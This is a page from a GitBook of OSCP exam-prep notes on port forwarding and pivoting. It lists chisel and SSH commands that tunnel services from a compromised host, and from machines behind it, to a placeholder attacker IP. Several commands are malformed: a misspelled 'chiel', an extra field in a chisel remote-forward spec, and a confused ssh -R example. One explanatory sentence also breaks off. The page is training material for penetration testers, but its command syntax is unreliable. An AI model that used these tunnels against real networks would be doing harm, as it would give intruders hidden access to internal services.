🐝
OSCP 2022 Materials
  • General
    • Whoami
    • Resources
    • Frequently Asked Questions
    • Shared Resource
  • Enumeration
    • Foreword
    • FTP
    • SMTP
    • DNS
    • Finger
    • HTTP/ HTTPS
      • Login Attacks
        • PHP Logins
      • XSS
      • LFI ( LFI -> RCE )
      • RFI ( RFI -> RCE )
      • CMS Exploitation
        • Wordpress
        • Magento
        • Bludit
        • Tomcat
        • Drupal
      • PHPMyAdmin
    • Kerberos
    • POP3
    • SMB
    • IMAP
    • SNMP
    • IRC
    • RSync
    • MSSQL
    • NFS
    • REDIS
    • Port Forwarding
  • Linux Post Exploitation
    • Post Exploit Checks
    • Pivoting ( ProxyChains )
  • Windows Post Exploitation
    • Post Exploit Checks
    • Active Directory ( Recon -> PE)
    • Notes
      • Powershell
      • Commands
  • Buffer Overflow
    • Hackthebox
    • TryHackMe
  • Mobile Pentesting
    • Android Pentesting
      • Lab TroubleShoot
      • Root Detection Bypass ( Manual )
      • Physical Device
  • MISC
    • Useful
    • Web
    • Linux
    • Application Specific
    • Programming Notes for Offensive Security
      • Python
    • Forensics
      • Disk Forensics
    • Inspection
    • Troubleshooting
      • Mouse Flickering
Powered by GitBook
On this page
  • Local Port Forwarding
  • Remote Port Forwarding
  • Dynamic Port Forwarding

Was this helpful?

  1. Enumeration

Port Forwarding

Port forwarding is a technique where the service running on the target machine / on any other machine on the network is forwarded to the attacker's machine which can be then accessed locally

Commonly used tools

  • Chisel

  • SSH

Local Port Forwarding

Local port forwarding is a technique to transfer the service running on the compromised machine to the attackers' machine

Chisel

Attackers Machine:

./chisel server -p 1337 --reverse

Compromised machine

# forwarding service on the compromised machine on port 5000 to attacker machines port 5000
./chisel client attackerip:1337 R:5000:127.0.0.1:5000

SSH

# The same on ssh
# Format: ssh -L attckermahineport:127.0.0.1:targetserviceport user@target
ssh -L 5000:127.0.0.1:5000 user@targetIP

Remote Port Forwarding

Remote port forwarding is a technique to transfer the service running on the machine which is persent in the same network as the compromised machine to the attackers' machine

Network Setup:

Machine A : Attackers Machine

Machine B : Compromised Machine ( Has an network card to communicate with Y network )

Machine C : Machine on Y network A ---> B ( Attacker can communicate with the Machine B )

B ---> C ( Machine B can communicate with both A and C with different network cards )

A --x-> C ( Attacker cannot communicate with the C since they are

Chisel

Attackers Machine:

./chiel server -p 9001 --reverse

Compromised Machine ( Machine B ):

# Machine C has a service on its port 3000 which has to be forwarded to attacker machine's port 3000
./chisel client attackerip:9001 R:3000:127.0.0.1:machineCIP:3000

SSH

# The same can be performed with SSH
# Format: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER
ssh -R machineCIP:3000:127.0.0.1:3000 user@machineBIP

Dynamic Port Forwarding

Dynamic Port forwarding is a pivoting technique which allows the attacker to access the services fully running on the compromized system with the use of proxychains

PreviousREDISNextPost Exploit Checks

Last updated 2 years ago

Was this helpful?

Pivoting ( ProxyChains )